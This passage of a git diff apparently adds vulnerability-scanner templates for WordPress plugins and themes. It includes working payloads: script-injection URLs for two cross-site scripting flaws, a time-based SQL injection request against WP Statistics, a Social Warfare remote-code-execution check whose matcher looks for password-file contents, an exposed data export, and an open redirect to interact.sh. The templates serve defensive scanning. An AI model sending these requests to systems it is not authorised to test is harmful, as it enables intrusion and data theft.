HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "showImageDetail")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml new file mode 100644 index 0000000000..163a61096c --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml @@ -0,0 +1,31 @@ +id: wp-qwiz-online-xss + +info: + name: Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues. + remediation: Fixed in version 3.37 + reference: + - https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4 + - https://packetstormsecurity.com/files/154403/ + - https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/ + metadata: + publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/" + verified: true + max-request: 1 + tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards + +http: + - raw: + - | + GET /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "quizzes/flashcard") && contains(body, "")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml b/http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml new file mode 100644 index 0000000000..e99ff37fbc --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml @@ -0,0 +1,34 @@ +id: wp-reality-estate-theme + +info: + name: Reality Estate Multipurpose WP-Theme < 2.5.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Reflected XSS was discovered in the 'Reality | Estate Multipurpose WordPress Theme'. + remediation: update to v.2.5.3 + reference: + - https://wpscan.com/vulnerability/10064 + - https://www.exploitalert.com/view-details.html?id=34777 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: "/wp-content/themes/reality/" + google-query: inurl:"/wp-content/themes/reality/" + tags: xss,wordpress,wp,wp-theme,reality,estate + +http: + - method: GET + path: + - "{{BaseURL}}/properties-with-map/?status&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "reality", "estate", ">=7' + - 'status_code_2 == 500' + - 'contains(body_1, "Smart Manager for e-Commerce")' + - 'contains(body_2, "rel=\"preconnect") || contains(body, "Error")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml new file mode 100644 index 0000000000..94d3049c1f --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml @@ -0,0 +1,42 @@ +id: wp-social-warfare-rce + +info: + name: Social Warfare <= 3.5.2 - Remote Code Execution + author: theamanrawat + severity: critical + description: | + Unauthenticated remote code execution has been discovered in functionality that handles settings import. + remediation: Fixed in version 3.5.3 + reference: + - https://wpscan.com/vulnerability/9259 + - https://wordpress.org/plugins/social-warfare/ + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/social-warfare/" + tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce + +http: + - raw: + - | + GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: helpers/payloads/wp-social-warfare-rce.txt + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: body + words: + - 'No changes made' + + - type: status + status: + - 500 diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml new file mode 100644 index 0000000000..ae9f45c410 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -0,0 +1,32 @@ +id: wp-statistics-sqli + +info: + name: WordPress WP Statistics Plugin 13.0.7 - SQL Injection + author: r3Y3r53 + severity: high + description: | + WordPress Plugin WP Statistics 13.0.7 contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + reference: + - https://www.exploit-db.com/exploits/49894 + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/ + - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ + - https://wordpress.org/plugins/wp-statistics/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/wp-statistics/" + tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)" + - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")' + - 'status_code == 500' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml new file mode 100644 index 0000000000..683281524a --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml @@ -0,0 +1,30 @@ +id: wp-superstorefinder-misconfig + +info: + name: Superstorefinder WP-plugin - Security Misconfigurations + author: r3Y3r53 + severity: medium + description: | + Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities. + reference: + - https://cxsecurity.com/issue/WLB-2021010145 + - https://www.exploitalert.com/view-details.html?id=36983 + metadata: + google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php" + publicwww-query: "/wp-content/plugins/superstorefinder-wp/" + verified: true + tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig + +http: + - raw: + - | + GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml b/http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml new file mode 100644 index 0000000000..2d982ceb1b --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml @@ -0,0 +1,26 @@ +id: wp-upward-theme-redirect + +info: + name: WordPress Upward Themes <1.5 - Open Redirect + author: r3Y3r53 + severity: medium + description: | + WordPress Upward Themes 1.5 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. + reference: + - https://cxsecurity.com/issue/WLB-2020030133 + metadata: + max-request: 1 + verified: true + google-query: inurl:"/wp-content/themes/Upward/" + tags: wordpress,wp-theme,wp,upward,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Upward/go.php?https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'